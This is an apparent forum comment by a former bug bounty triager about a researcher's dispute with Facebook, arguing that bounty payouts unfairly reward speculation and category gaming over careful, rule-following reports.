This speaks to a couple of issues that bothered me while working in bug bounty triage.<p>> Alex informed my employer (as far as I am aware) that I had found a vulnerability, and had used it to access sensitive data. He then explained that <i>the vulnerability I found was trivial and of little value</i>, and at the same time said that my reporting and handling of the vulnerability submission had caused huge concern at Facebook.<p>[my emphasis]<p>There is this conceptual separation between the severity of the issue and the impact. Simplifying things much further than the situation described in the piece, you could have an admin account with the password "password". This is a stupid issue. The fix is to change the admin password. How much of a bounty should be paid for this report?<p>One school of thought is that the value of the report is related to what you can accomplish by exploiting it. This is clearly the right approach if you're assessing the issue's value <i>to an attacker</i>. It has some problems in the bug bounty context -- a major one is that it feels subjectively unfair to the company! They don't want to pay 100x more for the same vulnerability just because, this time, it happened to have more sensitive stuff behind it.<p>Another is that, as here, you often see a chain of vulnerabilities, all of which are of very little consequence in isolation, but they happen to combine into something much greater than the sum of the parts. (I recall a published writeup, which I can no longer find, in which one important step was a logout CSRF. Nobody cares about those.) The policy of "stop investigating as soon as you find anything" rules out this kind of "whole is greater than the sum of the parts" finding by definition.<p>> Playing By The Rules<p>> Microsoft (in my opinion), has done the best job of explaining exactly how far they would like a researcher to take a vulnerability. Google and Yahoo imply that you should report a vulnerability immediately, but do not clarify how far you should go in determinining impact. Tumblr, on the other hand, puts in writing the policy of just about every bounty program. The better your PoC shows impact, the more you are likely to get paid. Further, the better a researcher can understand and describe impact, the more likely they are to receive a greater reward.<p>This bothers me from a fairness perspective. I have personally seen essentially the same report on different pages of a webapp get paid out differently because the researchers provided different <i>speculation</i> about what might be possible using their exploit. The guy who got paid less was careful about following the rules, asking for guidance about exactly what and how he could investigate, and then he only claimed what he was able to demonstrate. The guy who got paid more had a more generic claim that "this demonstrates SQLi, and writing to the database might be possible". I could not establish whether writing to the database <i>was in fact possible</i> for the same reason the first guy (and the second guy) didn't try -- it might have been unacceptably disruptive to the company. So I passed the speculation through, and the payout ended up being higher.<p>The lesson here is, "claim the moon and the stars." But I feel that means the ecosystem is unhealthy; that's not what I think the lesson <i>should be</i>.<p>Companies always say they will investigate the full impact of a vulnerability when you follow the protocol they urge of "as soon as you find something, report it and don't try to escalate". But this is nearly impossible to do even if you're trying in good faith.<p>---<p>Sometimes you're not trying in good faith. I have also seen what is exactly the same issue paid out differently depending on the category the researcher files it under. Many programs publish payout schedules by category. In this case, the schedule contained a mix of technical category types ("XSS") and functional category types ("account takeover"). One researcher found a way to present an issue in a low-paying technical category as a high-paying functional category. I repeatedly noted in my reports to the company that this researcher was getting paid quite a lot more for the same vulnerability than other researchers who didn't know about the loophole. This state of affairs never changed; I assume the main concern was maintaining the relationship with the loophole guy. But obviously, this sort of thing directly falsifies the claim that "we will investigate the full impact of the issue you report and pay out appropriately."